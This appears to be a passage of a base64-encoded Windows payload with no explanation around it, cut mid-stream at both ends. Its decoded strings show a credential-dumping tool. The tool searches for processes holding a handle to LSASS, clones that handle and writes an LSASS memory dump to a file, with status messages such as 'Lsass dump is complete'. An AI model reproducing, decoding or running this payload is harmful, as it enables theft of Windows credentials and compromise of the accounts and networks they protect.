5JaGNBUGhKRUtBQUJGTWNsQmlmaElpZHE1QlFBQUFPai8rLy8vUFFRQUFNQjB2b1hBRDRWWUNnQUFpNHdrbUFFQUFFaUoyamxMVUErRlB3b0FBSXQ2QkVpTHJvQUFBQUNKdkNTNEFRQUEvNWFJQUFBQVRJMEVmekhTU0luQlNjSGdBdi9WU0ltRUpMQUJBQUJJaGNBUGhBNEtBQUJJaTc2UUFBQUFTSTJzSkJBQ0FBQk1qYXdrOEFBQUFQK1dpQUFBQUVtSjJESFNUSTJrSkxBQUFBQklpY0c3QVFBQUFQL1hTSTJNSkpBQkFBQklpZkpJamJ3a2hBQUFBT2dBRlFBQWk1UWs0QUVBQUVVeHlVVXh3RWk0VFVSTlVKT25BQUJJaTR3azJBRUFBTWVFSk9BQUFBQUFBQUFBU0ltRUpOQUFBQUJJdUFRQUFBQWdBQUFBU0ltRUpOZ0FBQUJJeDRRazZBQUFBQ0lJQUFEL2xxQUFBQUJJaVhRa0lFbUo2VWlMakNUWUFRQUFRYmdnQUFBQVNJMlVKTkFBQUFEb1p3c0FBSXVFSk9BQkFBQk1pZW5IaENTa0FBQUFCd0FBQUlQQVVJbUVKT0FCQUFDSmhDU3NBQUFBLzVhd0FBQUF1bXdBQUFCSXVHNTBaR3hzTG1Sc3VYSnpBQUJJaVlRa2pBQUFBRWk0VW5Sc1IyVjBUblJtaVpRa2xBQUFBRWk2Vm1WeWMybHZiazVJaVlRa3NBQUFBRWlOaENTTUFBQUFTSW1VSkxnQUFBQm1pWXdreEFBQUFFaUp3Y2VFSk1BQUFBQjFiV0pseG9Ra3hnQUFBQUJJaVVRa1VQK1dxQUFBQUV5SjRrbUp4a2lKd2YrVzBBQUFBRWlKK2tpSmZDUm9USTJFSklnQUFBQk1pVVFrTUVpTmpDU0FBQUFBLzlCTWlmRkZNZmFCcENTSUFBQUEvLzhBQVArV3VBQUFBQSszaENUd0FBQUF4b1FrSndFQUFBSEhoQ1EwQVFBQUFnQUFBR2FKaENRZ0FRQUFpNFFrSEFFQUFNZUVKRHdCQUFBUUFBQUFpWVFrSWdFQUFJdUVKQkFCQUFCSXg0UWtRQUVBQUFBQUFBQ0loQ1FtQVFBQWk0UWtnQUFBQUVqSGhDUklBUUFBQUFBQUFJbUVKQ2dCQUFDTGhDU0VBQUFBaVlRa0xBRUFBSXVFSklnQUFBQ0poQ1F3QVFBQWk0UWs0QUVBQUlQQU9JbUVKRGdCQUFCRWlmSC9sc0FBQUFDRndIUVJTSW5ZUklueFNOUGdTQW1FSkVBQkFBQkJnOFlCUVlQK1FIWFlpNVFrNEFFQUFFVXh5VVV4d0VpSjcwaUxqQ1RZQVFBQVNJMWNKSGovbHFBQUFBQklpWFFrSUVtSjZVaU5oQ1FnQVFBQVNJdU1KTmdCQUFCSWljSkJ1RGdBQUFCSWlVUWtRT2hxQ1FBQU1jQzVRQUFBQUlPRUpPQUJBQUE0ODBpclNJbnAvNWJJQUFBQVNJbDBKQ0JJalZRa2ZFaUxqQ1RZQVFBQUFjQkppZGxCdUFRQUFBQ0pSQ1I4NkNrSkFBQklpWFFrSUVtSjJVaUo2a1NMUkNSOFNJdU1KTmdCQUFEb0RBa0FBSXRFSkh4Rk1jbEZNY0FEaENUZ0FRQUFpNVFrM0FBQUFNZUVKS2dBQUFBNEFBQUFnOEFFU0l1TUpOZ0JBQUNKaENUZ0FRQUEvNWFnQUFBQVNJbDBKQ0JKaWVsSWpZUWtwQUFBQUVpTGpDVFlBUUFBU0luQ1FiZ01BQUFBU0lsRUpFam9wZ2dBQUl1RUpPQUJBQUNMakNUSUFRQUF4NFFrcEFBQUFBUUFBQUNKUkNSZ2lZUWtyQUFBQUlYSkQ0UlVDQUFBZytrQlNJdVVKTUFCQUFCSWFja29BZ0FBU0luUVRJMkVDaWdDQUFBeHlROGZBSU00QVlQUkFFZ0ZLQUlBQUV3NXdIWHZhOGxzUlRIMlRJbGtKRmhNamJ3a0ZBSUFBTWVFSklRQUFBQUFBQUFBUlluMGpVRUVpMHdrWUluSGlVUWtaSW5JQWZoSWpid2tPQUVBQUltRUpPQUJBQUNOUVFTSlJDUTg2dzBQSDBRQUFFaUxsQ1RBQVFBQVJJbmpTR25iS0FJQUFFaU5EQnFMQVlYQUQ0VWhBZ0FBU0lQQkhQK1d5QUFBQUVpTGxDVEFBUUFBVEluNWpVUUFBa2dCMm9tRUpCQUNBQUJJZzhJYy81WUFBUUFBaTVRazRBRUFBRVV4eVVVeHdFZ0RuQ1RBQVFBQVNJdU1KTmdCQUFCSWkwTUlTSW1FSkNBQkFBQ0xReENKaENRb0FRQUFpME1ZaVlRa0xBRUFBSXRERkl1Y0pCQUNBQUNKbENRMEFRQUFpWVFrTUFFQUFJMUQvb1BEQkltRUpCQUNBQUQvbHFBQUFBQkJpZGhOaWVsSWllcElpWFFrSUVpTGpDVFlBUUFBNkNnSEFBQUJuQ1RnQVFBQVRJbjVTSXRVSkRESGhDU3dBQUFBWEFBQUFFakhCd0FBQUFCSXgwY0lBQUFBQUVqSFJ4QUFBQUFBU01kSEdBQUFBQUJJeDBjZ0FBQUFBRWpIUnlnQUFBQUF4MGN3QUFBQUFQK1c2QUFBQUluRGhjQVBoSklBQUFCTWk3YUFBQUFBLzVhSUFBQUFRWW5ZTWRKSWljRkIvOVpKaWNaSWhjQjBjb3VVSklnQUFBQkppY0ZCaWRoTWlmbi9sdkFBQUFDRndIUkJUSXRNSkZCSWkxUWtXRTJKNkV5SjhmK1crQUFBQUlYQWRDZUR2Q1NNQUFBQU5FRzROQUFBQUVpTGxDVHdBQUFBU0luNVJBOUdoQ1NNQUFBQVJZbkEveFpJaTU2UUFBQUEvNWFJQUFBQVRZbndNZEpJaWNILzA0dUVKSVFBQUFDTFRDUThSVEhKUlRIQVNNZUVKR3dCQUFBQUFBQUFTTWVFSkhRQkFBQUFBQUFBalZBQmE4QnNpWlFraEFBQUFFakhoQ1I4QVFBQUFBQUFBRWpIaENTRUFRQUFBQUFBQUkwVUNFaUxqQ1RZQVFBQS81YWdBQUFBU0lsMEpDQklpMVFrUUUySjZVaUxqQ1RZQVFBQVFiaHNBQUFBNkxjRkFBQkJnOFFCUkR1a0pNZ0JBQUFQZ3EzOS8vOU1pMlFrV0l0VUpHQkZNY2xGTWNBeDIwaUxqQ1RZQVFBQS81YWdBQUFBU0lsMEpDQklpMVFrYUUySjZVaUxqQ1RZQVFBQVFiZ0VBQUFBNkdZRkFBQ0xSQ1JrUlRISlJUSEFTSXVNSk5nQkFBQ0poQ1NvQUFBQWk0UWszQUFBQUkxUURQK1dvQUFBQUVpSmRDUWdTSXRVSkVoSmllbElpNHdrMkFFQUFFRzREQUFBQU9nZEJRQUE2eGNQSHdCTUFmTVBndk1BQUFCSWk1d2tFQUlBQUV3QjgwaUxqQ1NnQVFBQVFia3dBQUFBU1lub1NJbmEvNWJZQUFBQVNJWEFENFRGQUFBQWdid2tNQUlBQUFBUUFBQk1pN1FrS0FJQUFIVzBUSXU4SlBnQkFBQklpN3drRUFJQUFFMkYvdytFT2dRQUFJdUVKQUFDQUFDTGxDUUVBZ0FBT2RBUGdod0VBQUJNaTVhWUFBQUFBZEtKbENRRUFnQUFpVlFrUEV5SlZDUXcvNWFJQUFBQVJJdE1KRHhOaWZneDBreUxWQ1F3U0luQlNjSGhCRUgvMGttSngwaUpoQ1Q0QVFBQVRZWC9ENFFTQkFBQWk0UWtBQUlBQUVpTGpDUW9BZ0FBaWNLRHdBRkl3ZUlFU1FIWFRZbDNDRW1Kemt3QjgwbUpQNG1FSkFBQ0FBQVBndzMvLy8rTGhDUUFBZ0FBaTVRazRBRUFBRVV4eVVVeHdNZUVKS1FBQUFBSkFBQUFqVWdCU0ltRUpQQUFBQUNKejRtVUpLd0FBQUJJaTR3azJBRUFBTUhuQkkwRU9vbDhKR0JJaVlRaytBQUFBUCtXb0FBQUFFaUpkQ1FnVElucVNZbnBTSXVNSk5nQkFBQkJ1QWdBQUFCRk1lM29xQU1BQUl1RUpPQUJBQUJGTWNsRk1jQklpNHdrMkFFQUFJMVFDSW1VSk9BQkFBRC9scUFBQUFCSWlYUWtJRW1KNlVpTGpDVFlBUUFBU0kyVUpQZ0FBQUJCdUFnQUFBRG9ZQU1BQUl1RUpPQUJBQUNOZUFpTGhDUUFBZ0FBaVh3a1BFR0p4a0hCNWdSQkFmNUVpYlFrNEFFQUFJWEFENFNnQVFBQVJJbHNKREJJaTN3a1VBOGZnQUFBQUFCRWkzd2tNRVV4eVVVeHdFVXg3VWlMaENUNEFRQUFTSXVNSk5nQkFBQkp3ZWNFVEFINFNJc1FTSXRBQ0VpSmxDUWdBUUFBVElueVNJbUVKQ2dCQUFEL2x1QUFBQUJJaTRRaytBRUFBRXdCK0VpTFdBaEloZHQxSnVuU0FBQUFacEJJaTRRaytBRUFBRW1CeFFBRUFBQk1BZmhJaTFnSVREbnJENGF4QUFBQVNZblpSQ25yVFNucFNZSDUvd01BQUhZTFFia0FCQUFBdXdBRUFBQklpeEJNaVdRa0lFbUo2RWlMakNTZ0FRQUFTTWVFSkxBQUFBQUFBQUFBVEFIcTZEM3ovLytGd0hXWlNJbDBKQ0JKaWZsQmlkaElpZXBJaTR3azJBRUFBT2crQWdBQTZYbi8vLzltRHgrRUFBQUFBQUJJQWNJNVNsQVBoTUgxLy8rTEFvWEFkZTVJaTc2UUFBQUEvNWFJQUFBQVNZbllNZEpJaWNILzF6SEFTSUhFR0FZQUFGdGVYMTFCWEVGZFFWNUJYOE9RaTF3a1BFaUxqQ1RZQVFBQVJUSEpSVEhBVEFPMEpDZ0JBQUNKMm9QREVQK1dvQUFBQUVpSmRDUWdTSXRVSkVCTmllRklpNHdrMkFFQUFFRzRFQUFBQU9pckFRQUFnMFFrTUFHTFJDUXdpVndrUER1RUpBQUNBQUFQZ25IKy8vK0xSQ1JnU0l1TUpOZ0JBQUJGTWNsRk1jQ0poQ1NvQUFBQWk0UWszQUFBQUkxUUdQK1dvQUFBQUVpSmRDUWdTSXRVSkVoSmllbElpNHdrMkFFQUFFRzREQUFBQU9oSUFRQUFpNFFrM0FBQUFFVXh5VVV4d0VpTGpDVFlBUUFBalZBay81YWdBQUFBU0lsMEpDQklpNHdrMkFFQUFFbUo2VWlObENTWUFBQUFRYmdNQUFBQTZBY0JBQUJJaTd3azZBRUFBRWlMbnBBQUFBRC9sb2dBQUFBeDBrbUorRWlKd2YvVFNJdThKUGdCQUFCSWk1NlFBQUFBLzVhSUFBQUFNZEpKaWZoSWljSC8wMGlMdkNUQUFRQUFTSXVla0FBQUFQK1dpQUFBQURIU1NZbjRTSW5CLzlOSWk3d2tzQUVBQUVpTG5wQUFBQUQvbG9nQUFBQXgwa2lKd1VtSitQL1R1QUVBQUFEcGZQNy8vMHlKOGVrMy9QLy9USXUrZ0FBQUFNZUVKQVFDQUFBZ0FBQUEvNWFJQUFBQVFiZ0FBZ0FBTWRKSWljRkIvOWRKaWNkSWlZUWsrQUVBQUUyRi93K0Y3dnYvLzBqSGhDUUFBZ0FBQUFBQUFFeUx0Q1FvQWdBQTZRNzcvLytMUkNSZ3gwUWtaQVFBQUFESGhDU0VBQUFBQUFBQUFJUEFCSW1FSk9BQkFBRHBZUHIvLzBGV1RZbk9RVlZKaWMxQlZGVlhTSW5YVmxORWljTklnK3d3VEl1a0pKQUFBQUJKaTdRa2dBQUFBRUgvbENTSUFBQUFNZEpKaWRoSWljSC8xa2lGd0ErRWd3QUFBRWlKM1VpSnhvWGJkQzB4d0E4ZmdBQUFBQUFQdGhRSGlCUUdTSVBBQVVnNXczWHdTSW53U0FIelpwQ0FNRUZJZzhBQlNEbkRkZlJCaWVoSWlmSk1pZWxOaWZGSXgwUWtJQUFBQUFCQi8xUWtlRW1MbkNTUUFBQUFRZitVSklnQUFBQklnOFF3U1lud01kSklpY0ZJaWRoYlhsOWRRVnhCWFVGZS8rQVBINEFBQUFBQVNJUEVNRnRlWDExQlhFRmRRVjdEa0pDUWtKQ1FrSkNRUVZjeHdFRldRVlZCVkZWWFZraUp6cmtlQUFBQVUwaUI3RmdIQUFCSWpid2tRQUVBQUV5SmhDU3dCd0FBODBpcnVSNEFBQUJJeDBRa1lBQUFBQUJJeDBRa2FBQUFBQURIaENTd0FBQUFNQUFBQUVqSGhDUzRBQUFBQUFBQUFNZUVKTWdBQUFBQUFBQUFTTWVFSk1BQUFBQUFBQUFBeHdjQUFBQUFTSTI4SkZBQ0FBRHpTS3RJdUZBQWNnQnZBR01BU01lRUpOQUFBQUFBQUFBQVNJbUVKSUFBQUFCSXVHVUFjd0J6QUFBQVNJbUVKSWdBQUFDNGN3QUFBRWpIaENUWUFBQUFBQUFBQUVqSFJDUndBQUFBQUVqSFJDUjRBQUFBQUVqSGhDUXdBUUFBQUFBQUFFakhoQ1E0QVFBQUFBQUFBRWpIaENSQUFnQUFBQUFBQUVqSGhDUklBZ0FBQUFBQUFNY0hBQUFBQU1kRUpGcHNjMkZ6Wm9sRUpGNkxEb1hKRDRTVkF3QUFpZFZOaWN3eDIwVXgvMFV4OXVzT0R4OEFnOE1CT1I0UGhqMERBQUNKMzRYdGRBcElqUVIvT1d6R0NIWGxTSTBFZjR0RXhoZzlBQUFRQUErVndUMkpBUklBRDVYQ2hORjB5U1gvLy9mL1BaOEJFZ0IwdlUyRjluUVFRYmdBZ0FBQU1kSk1pZkZCLzFRa09FaU5CSDlJalV3a2FMcEFCQUFBU01kRUpIZ0FBQUFBVEkwc3hreU5UQ1J3UVl0RkNFeU5oQ1N3QUFBQVNJbEVKSERvUE9mLy8wRVB0MVVPeDBRa01BQUFBQUJNalV3a1lNZEVKQ2dBQUFBQVNJdE1KR2hKeDhELy8vLy94MFFrSUJBRUFBRG9QZVQvLzBHNUJBQUFBRUc0QUJBQUFESEp1Z0FRQUFCQi8xUWtTRW1KeGtpRndBK0VHLy8vLzBpTFRDUmdRYmtBRUFBQVNZbkF1Z0lBQUFCSXgwUWtJQUFBQUFEbzl1ci8vNFhBRDRqeS92Ly9TWXRPQ0VpTmxDU0FBQUFBUWY5VUpGQ0Z3QStGMmY3Ly8waU52Q1F3QVFBQU1kSklpMHdrWUVHNUJBRUFBRW1KK0VIL1ZDUmdoY0FQaExUKy8vOUlqWVFrUUFJQUFFaUxUQ1JvUWJnRUFRQUFTSWxFSkVoSWljSkIvMVFrYUlYQUQ0U00vdi8vU0kxVUpGcElpZmxCLzFRa1dFaUZ3QStFZHY3Ly8wSDNSUmdRQkFBQUQ0Um8vdi8vU0l0TUpFaElqYndrWUFNQUFFeU52Q1JRQlFBQVFmOVVKSEM1UGdBQUFFeUxSQ1J3U0xwa0lHRnVaQ0J6ZFVtSndVaTRXeXRkSUVadmRXNUlpWlFrNkFBQUFFaTZiSGtnWTJ4dmJtVklpWVFrNEFBQUFFaTRZMk5sYzNObWRXeElpWVFrOEFBQUFFaTRaQ0JvWVc1a2JHVklpWVFrQUFFQUFFaTRJR3h6WVhOeklHbElpWVFrRUFFQUFFaTRDVnNyWFNCSVlXNUlpWVFra0FBQUFFaTRkSE02SUNWNENnQklpWVFrb0FBQUFESEE4MGlyU0ltVUpQZ0FBQUJJamJ3a1lBVUFBRWk2SUNnbFpDa2dkRys1UGdBQUFFaUpsQ1FJQVFBQVNMcHVPaUFsY3lBb0pmTklxMGlKbENRWUFRQUFTSTI4SkZBREFBQkl1bVJzWlNCU2FXZG9TSW1VSkpnQUFBQklpZmxJalpRazRBQUFBRXlKUkNRZ3g0UWtJQUVBQUdRcENnQkl4NFFrVUFNQUFBQUFBQUJJeDRRa1dBTUFBQUFBQUFCSXg0UWtVQVVBQUFBQUFBQkl4NFFrV0FVQUFBQUFBQUJCLzFRa0dFV0xSUmhNaWZsSWpaUWtrQUFBQUVIL1ZDUVlTSXVNSkxBSEFBQklpZnBCLzFRa0NFeUora2lMakNTd0J3QUFRZjlVSkFoTWkzd2tZSVh0ZFZsTWlmbUR3d0ZCLzFRa0tEa2VENGZKL1AvL1pnOGZSQUFBU0l0TUpHaEloY2wwQlVIL1ZDUW9UWVgyZEJCQnVBQ0FBQUF4MGt5SjhVSC9WQ1E0U0lIRVdBY0FBRXlKK0Z0ZVgxMUJYRUZkUVY1Qlg4TkZNZi9yNUVpTFRDUm9TSVhKZGNEcnlKQ1FrSkJCVjBtSjEwRldUWW5HUVZWQmljMU1pY2xCVkZOTWljdElnZXl3QUFBQTZPd0xBQUJJaGNBUGhGTUJBQUJFaWVwSmlkbE5pZmhJaWNGSmljVG83L3IvLzBtSnhVaUZ3QStFa3dJQUFFaTRXeXBkSUU1dmR5Qk1pZm5HUkNSaUFFaTZkSEo1YVc1bklIUklpVVFrUUVpNGJ5QmtkVzF3SUd4SWlWUWtTRWk2YzJGemN5QXVMaTVJaVVRa1VMZ2dDZ0FBU0lsVUpGaElqVlFrUUdhSlJDUmcvMU1JVElueFJUSEpSVEhBU01kRUpEQUFBQUFBdWdBQUFFREhSQ1FvZ0FBQUFNZEVKQ0FDQUFBQS8xTWdTWW5HU0lQNC93K0VGZ0VBQUV5SjZmOVRNRW1KMlUySjhFeUo2WW5DNkxEci8vK0Z3QStFZUFFQUFFaTRXeXRkSUV4ellYTk1pZmxJdW5NZ1pIVnRjQ0JweDRRa2lBQUFBSFJsQ2dCSWlVUWtjRUcvQVFBQUFFaTRjeUJqYjIxd2JHVklpVlFrZUVpTlZDUndTSW1FSklBQUFBRC9Vd2hOaGZaMEJreUo4ZjlUS0V5SjZmOVRLRUc0QUlBQUFESFNUSW5oLzFNNFNJSEVzQUFBQUVTSitGdEJYRUZkUVY1Qlg4Tm1EeCtFQUFBQUFBQkl1RnN0WFNCR1lXbHNUSW41U0xwbFpDQjBieUJuWmNlRUpKQUFBQUJzWlhNS1NJbEVKSEJGTWY5SXVIUWdZU0JzYVhOMFNJbFVKSGhJdWlCdlppQm9ZVzVrU0ltVUpJZ0FBQUJJalZRa2NFaUpoQ1NBQUFBQXhvUWtsQUFBQUFEL1V3anBlLy8vL3c4ZmhBQUFBQUFBU0xoYkxWMGdRMjkxYkV5SitVaTZaQ0J1YjNRZ2QzTEhoQ1NZQUFBQWFXeGxDa2lKUkNSd1JUSC9TTGhwZEdVZ2RHOGdjMGlKVkNSNFNMcHdaV05wWm1sbFpFaUpoQ1NBQUFBQVNMZ2diM1YwY0hWMFpraUpsQ1NJQUFBQVNJMVVKSEJJaVlRa2tBQUFBTWFFSkp3QUFBQUEvMU1JNmQvKy8vOW1EeDlFQUFCSXVGc3RYU0JUYjIxbFRJbjVSVEgvU0xwMGFHbHVaeUIzWlVpSlJDUndTTGh1ZENCM2NtOXVaMGlKVkNSNFNMb2dkMmhwYkdVZ1pFaUpoQ1NBQUFBQVNMaDFiWEJwYm1jS0FFaUpsQ1NJQUFBQVNJMVVKSEJJaVlRa2tBQUFBUDlUQ09sdC92Ly9aZzhmaEFBQUFBQUFTTGhiTFYwZ1EyOTFiRXlKK1VpNlpDQnViM1FnWm1uSGhDU2dBQUFBYVdRS0FFaUpSQ1J3UlRIL1NMaHVaQ0JoY0hCeWIwaUpWQ1I0U0xwd2NtbGhkR1VnYUVpSmhDU0FBQUFBU0xoaGJtUnNaU0JwYmtpSmxDU0lBQUFBU0xvZ1oybDJaVzRnY0VpSmxDU1lBQUFBU0kxVUpIQklpWVFra0FBQUFQOVRDT254L2YvL2tKQ1FrSkNRa0pDUWtKQ1FRVmU0cUJVQUFFRldRVlZCVkZWWFZsUG9hdHovLzBHNEFCQUFBRWdweEVtSnpESEF1UUFDQUFCSWpid2tvQVVBQUVpTm5DU2dBUUFBU0luVlNNZEVKSEFBQUFBQTgwaXJ1VUFBQUFCSWlkOU1qYlFrb0FNQUFQTklxMHlKOTdsQUFBQUFTSTIwSktBRkFBRHpTS3RNalV3a1pFaUo4a21MVENRUVNNZEVKSGdBQUFBQVNNZUVKSUFBQUFBQUFBQUF4MFFrWkFBQUFBRC9sUkFCQUFDTFJDUmtTSTJNSkpBQUFBQklpVXdrT01Ib0E0bEVKR1FQaElJQkFBQk1qWHdrY0RIL1RJbjRUWW4zU1luR0R4OUFBRW1MVENRUVNJc1dRYmtZQUFBQVRZbncvNVVZQVFBQWhjQVBoRDRCQUFCSmkwd2tFRWlMRmtHNUFBRUFBRW1KMlArVklBRUFBSVhBRDRRZkFRQUFTTGd1QUhNQWJ3QUFBRWlKMmNlRUpKZ0FBQUErQUFBQVNJbEVKR2hJdUR3QVpRQnNBR1lBU0ltRUpKQUFBQUQvbGNnQUFBQkltRXlOREVOSmpWSCtTRG5hY3gvcHZnSUFBR1lQSDRRQUFBQUFBSVA0TDNRVVNJMUMva2c1MkhJUFNJbkNEN2NDZy9oY2RlZElnOElDU1NuUnVmOEFBQUJCdVA4QUFBQk5pYzFNaVV3a0tFblIvVW1CK2Y4QkFBQk1EMGZwVEluNVM0MUVMUUJJaVVRa1FFd0IrRWlKUkNRdy8xVUFTSXRFSkRCTWkwd2tLREhKWm9rSVNZUDVDQStIaGdBQUFFbUQrUVlQaDVVQUFBQk1pZnJyQ3c4ZmdBQUFBQUJJZzhJQ0Q3Y0NSSTFBdjQxSUlHWkJnL2dhRDBMQlpva0Nab1hBZGVKTWkyd2tjSXRFSkhoSmkwd2tFRXlMUkNRNFRJbnFpVVFrS09nTERRQUFoY0FQaFpNQUFBQ0R4d0ZJZzhZSU9Yd2taQStIa3Y3Ly8waUJ4S2dWQUFCYlhsOWRRVnhCWFVGZVFWL0RaZzhmUkFBQVNZbm9USW5xVEluNTZOb0pBQUJJbUVpRndBK0ZQd0VBQUVpTFJDUkFTSTFVSkdoSmpVd0grditWS0FFQUFJWEFENFZPLy8vL1NZMVYvVW1KNkV5SitlaWpDUUFBU0poSWhjQVBoRFQvLy85SktjVklpMVFrT0V1TlRHLzYvNVVBQVFBQTZSei8vLytMaENUb0FBQUFUWXRFSkRDSlJDUXdpNFFrbUFBQUFJbEVKRUJOaGNBUGhPUUFBQUJCaTBRa09FR0xWQ1E4T2RCeVZVeUxuWmdBQUFBQjBreUpSQ1JZUVlsVUpEeUpWQ1JVVElsY0pFai9sWWdBQUFDTFZDUlVUSXRFSkZoTWkxd2tTRWlKd1V4cHlpZ0NBQUF4MGtILzAwbUp3RW1KUkNRd1RZWEFENFRGQUFBQVFZdEVKRGhJYWNBb0FnQUFTWXRNSkJCTWllcEJ1UVFCQUFCTmpVUUFIUCtWQ0FFQUFFR0xSQ1E0aTB3a0tFaUp3a2hwd0NnQ0FBQkpBMFFrTUlsSUVJdE1KRUNEd2dGTWlXZ0lpVWdVaTB3a01NY0FBQUFBQUlsSUdFR0pWQ1E0NlliKy8vOW1EeCtFQUFBQUFBQkpLY1V4MG1aQ2laUnNvQU1BQU9rWi92Ly9EeDlFQUFCQngwUWtQQ0FBQUFCTWk0MkFBQUFBVElsTUpFai9sWWdBQUFCQnVBQkZBQUJNaTB3a1NESFNTSW5CUWYvUlNZbkFTWWxFSkRCTmhjQVBoVHYvLy85SngwUWtPQUFBQUFEcEdQNy8vMEc0L3dBQUFFeUp5a3lKK2Y5VkFESEFab21FSktBREFBRHBxZjMvLzVDUWtKQ1FrSkNRa0pDUWtKQkJWYnA4WWZST1FWUkppY3k1WTlkUDVsZElnZXhRQWdBQTZJSUNBQUJJaGNBUGhIc0JBQUJKaWNDNExnQUFBRWlOZkNSQXVSNEFBQUJtaVVRa0xqSEFRUSsyRkNUelNLdTVIZ0FBQUVqSFJDUXdBQUFBQUVqSFJDUTRBQUFBQUVqSGhDUkFBUUFBQUFBQUFFakhoQ1JJQVFBQUFBQUFBTWNIQUFBQUFFaU52Q1JRQVFBQTgwaXJ4d2NBQUFBQWhOSjBHbVlQSDBRQUFBKzJ5RWlEd0FHSVZBd3dRUSsyRkFTRTBuWHNUSTFrSkRCSWpWUWtMa3lKNFVILzBFbUp3RWlGd0ErRTJnQUFBQSsyVUFIR0FBQ0UwZytFQ1FFQUFESEFEeCtBQUFBQUFBKzJ5RWlEd0FHSWxBeEFBUUFBUVErMlZBQUJoTkoxNkErMmhDUkFBUUFBaE1BUGhOZ0FBQUJNallRa1FRRUFBTGtGRlFBQUR4OEFpY3BKZzhBQndlSUZBZEFCd1VFUHRrRC9oTUIxNm9IeFJFTkNRVUdKelErMlJDUXdoTUFQaEtjQUFBQk1qVVFrTWJrRkZRQUFacENKeWttRHdBSEI0Z1VCMEFIQlFRKzJRUCtFd0hYcWdmRkVRMEpCNkk4QUFBQklpY0ZJaGNCMEYwU0o2dWl2Q0FBQVNJSEVVQUlBQUY5QlhFRmR3MmFRdVRHdEFqSG9aZ0FBQUVpSndVaUZ3SFVXTWNCSWdjUlFBZ0FBWDBGY1FWM0REeCtBQUFBQUFMcS9zLzBlNkc0SUFBQkloY0IwMjB5SjRmL1FTSW5CU0lYQWRhVXh3T3ZNRHgrRUFBQUFBQUJCdlVGV1FrSHBUUC8vLzdsQlZrSkI2WGYvLy8rUWtKQ1FrSkNRa0pDUWtHVklpd1FsWUFBQUFFaUxRQmlCOFVSRFFrRkJpY3BNaTFnZ1RZblpEeDhBU1l0SlVFaUZ5WFJqRDdjQlpvWEFkRjlJaWNvUEgwQUFSSTFBdjJaQmcvZ1pkd2FEd0NCbWlRSVB0MElDU0lQQ0FtYUZ3SFhpRDdjQlpvWEFkREpCdUFVVkFBQVBIMEFBUkluQ1NJUEJBc0hpQlFIUVFRSEFEN2NCWm9YQWRlbEZPY0owRjAyTENVMDV5M1dVTWNERGtFRzRCUlVBQUVVNXduWHBTWXRCSU1OQlZFR0oxRk9KeTBpRDdGam9ULy8vLzBpRndIVWl1VEd0QWpIb1FQLy8vMGlKd1VpRndIVW9TSVBFV0RIQVcwRmN3MllQSDBRQUFFaUR4RmhFaWVKSWljRmJRVnpwUmdjQUFHWVBIMFFBQUxxL3MvMGU2RFlIQUFCSWhjQjB5WUg3bCt4Ym1BK0VoUUFBQUlIN0RjbGlKZytFNlFBQUFJSDdZOWRQNWcrRXRRQUFBSUg3aUNiNEFBK0VBUUVBQUlIN3V3N085WFdSU0xwQmNHa3RiWE10ZDhaRUpFSUFTTGxwYmkxamIzSmxMVWlKVkNRZ1NMcDJaWEp6YVc5dUxVaUpUQ1FvU0xsc01TMHhMVEF1WkVpSlZDUXd1bXhzQUFCSWlVd2tPRWlOVENRZ1pvbFVKRUQvMEVpSndlc3NacEJCdUd4c0FBQklqVXdrSU1aRUpDb0FTTHRWYzJWeU16SXVaRWlKWENRZ1prU0pSQ1FvLzlCSWljRkloY2tQaEFYLy8vOUlnOFJZUkluaVcwRmM2VjRHQUFCbUR4OUVBQUJJdTFOb2JIZGhjR2t1U0kxTUpDREhSQ1FvWkd4c0FFaUpYQ1FnLzlCSWljSHJ2dzhmUkFBQVNMdEJaSFpoY0drek1raU5UQ1FneGtRa0xBQklpVndrSU1kRUpDZ3VaR3hzLzlCSWljSHJrZzhmaEFBQUFBQUFTTHRRYzJGd2FTNWtiTGxzQUFBQVpvbE1KQ2hJalV3a0lFaUpYQ1FnLzlCSWljSHBZdi8vLzVDUWtKQ1FrSkNRUVZSRk1jQkZNZVJXVTBpSnkwaUQ3RERIUkNRc0FBQUFBRWlOZENRc1NZbnhUSW5pdVJBQUFBRG9qTjMvLzRYQWVRbzlCQUFBd0hRWFJUSGtTSVBFTUV5SjRGdGVRVnpERHgrRUFBQUFBQUJOaGVSMERrRzRBSUFBQURIU1RJbmgvMU00UWJnQUVBQUFpMVFrTEVHNUJBQUFBREhKLzFOSVJJdEVKQ3hKaWNUcm5KQ1FrSkNRa0pDUWtKQ1FrSkNRUVZkQlZrV0p4a0ZWVFluTlFWUlZNZTFYU0lub1Zvbk91U2NBQUFCVFNJblRTSUhzeUFVQUFFaU52Q1NBQUFBQVRJMjhKSUFBQUFEelNLdE1pZm5vN1FZQUFFR0p4SVhBZFI1SWdjVElCUUFBUkluZ1cxNWZYVUZjUVYxQlhrRmZ3dzhmZ0FBQUFBQk1pZm5vQUEwQUFFR0p4SVhBRDRRZEFnQUFoZllQaE1VQUFBQkl1RnNxWFNCRGFHVmpUSW5wU0xwcmFXNW5JR1p2Y3NhRUpBQUVBQUFBU0ltRUpNQURBQUJCdkFFQUFBQkl1Q0J3Y205alpYTnpTSW1VSk1nREFBQkl1bVZ6SUhkcGRHZ2dTSW1FSk5BREFBQkl1R0VnYzNWcGRHRmlTSW1VSk5nREFBQkl1bXhsSUdoaGJtUnNTSW1FSk9BREFBQkl1R1VnZEc4Z2JITmhTSW1VSk9nREFBQkl1bk56SUM0dUxpQUtTSW1VSlBnREFBQklqWlFrd0FNQUFFaUpoQ1R3QXdBQS81UWtpQUFBQUV5SitreUo2ZWhDQlFBQTZRZi8vLzhQSDBRQUFFaU52Q1RRQVFBQXVUNEFBQUJGaWZER1JDUnlBRWk0V3lwZElFRjBkR1ZJdW0xd2RHbHVaeUIwU01lRUpNQURBQUFBQUFBQVRJMmtKTUFEQUFCSWlVUWtRRWlOdENUQUFRQUFTTGh2SUdOc2IyNWxJRWlKUkNSUVNMaHVaR3hsSUdaeWIwaUpSQ1JndUdRS0FBQm1pVVFrY0VpNFd5cGRJRTkxZEdaSWlVUWtJRWlKNlBOSXEwaUpWQ1JJdVQ0QUFBQkl1bXh6WVhOeklHaGhTSTI4Sk5BREFBQklpVlFrV0VpNmJTQndhV1E2SUNWSXg0UWt5QU1BQUFBQUFBRHpTS3RJaWZGSWlWUWthRWk2YVd4bE9pQWxjd3BJaVZRa0tFaU5WQ1JBeGtRa01BQkl4NFFrd0FFQUFBQUFBQUJJeDRRa3lBRUFBQUFBQUFEL2xDU1lBQUFBU1luWVRJbmhTSTFVSkNEL2xDU1lBQUFBU0lueVRJbnAvNVFraUFBQUFFeUo0a3lKNlVHOEFRQUFBUCtVSklnQUFBQk5pZmxK